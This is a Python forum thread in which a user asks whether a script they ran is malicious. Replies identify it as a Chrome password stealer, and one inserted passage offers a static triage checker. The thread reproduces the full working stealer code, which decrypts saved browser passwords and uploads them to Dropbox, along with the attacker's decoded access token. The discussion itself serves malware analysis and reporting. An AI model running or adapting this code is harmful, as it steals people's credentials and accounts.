Python Forum
Help! I accidentally ran a file without checking the code - Printable Version

+--- Thread: Help! I accidentally ran a file without checking the code (/thread-30988.html)



Help! I accidentally ran a file without checking the code - scaryzane - Nov-16-2020

So I accidentally ran this file today, and didn't check the Python code. Can anybody tell me if this code is malicious?
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass


def upload_passfile():
    access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13')
    file_from = "rc.txt"
    file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
    client = dropbox.Dropbox(access_token)
    client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)


def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass

    except Exception as e:
        decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
        return str(decrypted_pass[1])


if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        passfile = open("rc.txt", "w")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
        passfile.close()
        conn.close()

    except Exception as e:
        print(e)

    upload_passfile()
    os.remove("rc.txt")
    os.remove("Loginvault.db")



RE: Help! I accidentally ran a file without checking the code - jefsummers - Nov-16-2020

Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW.


RE: Help! I accidentally ran a file without checking the code - iiAsez - Dec-25-2020

I had this issue too, but after some code analysis I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended).


RE: Help! I accidentally ran a file without checking the code - DeaD_EyE - Dec-25-2020

Hm, the hacker should have used pathlib, and his hack works only on Windows.

  1. Getting the master key from Chrome
  2. Copying Login Data to another place (Chrome locks the database)
  3. Iterating over the SQL SELECT of logins and passwords, saving line by line in a text file rc.txt, using the master key to decrypt.
  4. Sending rc.txt to a Dropbox account
  5. Deleting rc.txt and the copy of the login database.

One thing is strange. Where does the module dropbox come from?
This hack can only work if the dropbox dependency is installed in your current Python interpreter.

PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
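A defender-side way to catch a script like this before running it, added here as an example that is not part of the thread: a static triage pass with Python's ast module that flags the indicators enumerated in the steps above (Chrome's Local State / Login Data paths, DPAPI CryptUnprotectData, a Dropbox upload, removal of temp files) and decodes any rot13-wrapped string literal, which is how the token in the PS was recovered. The sample source is constructed to mirror the posted script and carries a placeholder token, not the real one.

```python
import ast
import codecs

# Indicators taken from the script posted in this thread: browser credential
# store access, DPAPI decryption, cloud exfiltration and cleanup of temp files.
SUSPICIOUS_IMPORTS = {"win32crypt", "dropbox"}
SUSPICIOUS_STRINGS = ("Login Data", "Local State", "os_crypt", "FROM logins")
SUSPICIOUS_CALLS = ("CryptUnprotectData", "files_upload", "remove")


def triage_source(source):
    """Parse Python source (never executed) and return a dict of findings."""
    findings = {"imports": set(), "strings": set(), "calls": set(), "rot13": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            findings["imports"].update(a.name for a in node.names if a.name in SUSPICIOUS_IMPORTS)
        elif isinstance(node, ast.ImportFrom) and node.module in SUSPICIOUS_IMPORTS:
            findings["imports"].add(node.module)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            findings["strings"].update(s for s in SUSPICIOUS_STRINGS if s in node.value)
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if name in SUSPICIOUS_CALLS:
                findings["calls"].add(name)
            # encode("...", 'rot13') only hides a hard-coded secret from a casual read.
            args = node.args
            if (name == "encode" and len(args) == 2
                    and all(isinstance(a, ast.Constant) for a in args)
                    and isinstance(args[0].value, str)
                    and args[1].value in ("rot13", "rot_13")):
                findings["rot13"].append(codecs.decode(args[0].value, "rot13"))
    return findings


# Constructed sample mirroring the posted script; the rot13 literal is a placeholder.
SAMPLE = '''
import os, sqlite3, win32crypt
import dropbox
from codecs import encode
token = encode("CYNPRUBYQRE_GBXRA", 'rot13')
state = os.environ['USERPROFILE'] + "/AppData/Local/Google/Chrome/User Data/Local State"
key = win32crypt.CryptUnprotectData(b"x", None, None, None, 0)[1]
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
dropbox.Dropbox(token).files_upload(b"", "/passwords/x.txt")
os.remove("rc.txt")
'''

if __name__ == "__main__":
    for category, hits in triage_source(SAMPLE).items():
        print(f"{category}: {sorted(hits)}")
```

Run it against a downloaded .py file's contents before executing the file; a hit in every category is a strong sign of a credential stealer like the one in this thread.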


RE: Help! I accidentally ran a file without checking the code - buran - Dec-25-2020

(Dec-25-2020, 02:10 PM)DeaD_EyE Wrote: PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
Probably you can report them. It most likely violates Dropbox ToS.


RE: Help! I accidentally ran a file without checking the code - DeaD_EyE - Dec-30-2020

They are investigating now, but the team is not allowed to visit external URLs.
So, I also provided them with the source code today.